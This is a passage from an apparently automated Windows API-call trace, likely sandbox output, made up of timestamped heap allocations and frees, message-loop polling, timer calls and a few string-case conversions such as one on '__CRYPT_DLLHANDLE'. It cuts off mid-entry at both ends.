dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0160.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0160.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0160.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0160.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0160.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0160.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0160.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0160.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0160.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0160.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0160.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0160.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0160.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0160.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0160.081] CharLowerBuffW (in: lpsz="byte[194056]", cchLength=0xc | out: lpsz="byte[194056]") returned 0xc [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0160.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0160.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0160.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0160.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0160.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0160.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0160.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0160.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0160.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3bf0050 [0160.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0160.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0160.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0160.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0160.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0160.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0160.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0160.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0160.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0160.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0160.506] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0160.506] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0160.506] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0160.506] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0160.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0160.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0160.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0160.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0160.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0160.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0160.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x3c1f660 [0160.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0160.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x3c4ec68 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1f660 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0160.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c4ec68 | out: hHeap=0x970000) returned 1 [0160.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0160.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0160.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0160.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0160.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0160.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0160.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0160.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0160.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0160.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0160.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0160.525] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0160.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0160.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0160.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0160.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0160.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0160.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0160.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0160.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0160.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0160.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0160.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0160.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0160.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0160.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0160.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0160.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0160.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0160.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0160.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0160.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0160.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0160.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0160.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0160.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0160.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0160.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0160.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0160.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0160.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0160.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0160.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0160.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x3c1f660 [0160.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1f660 | out: hHeap=0x970000) returned 1 [0160.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0160.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0160.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0160.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0160.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0160.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0160.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0160.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0160.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0160.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.723] 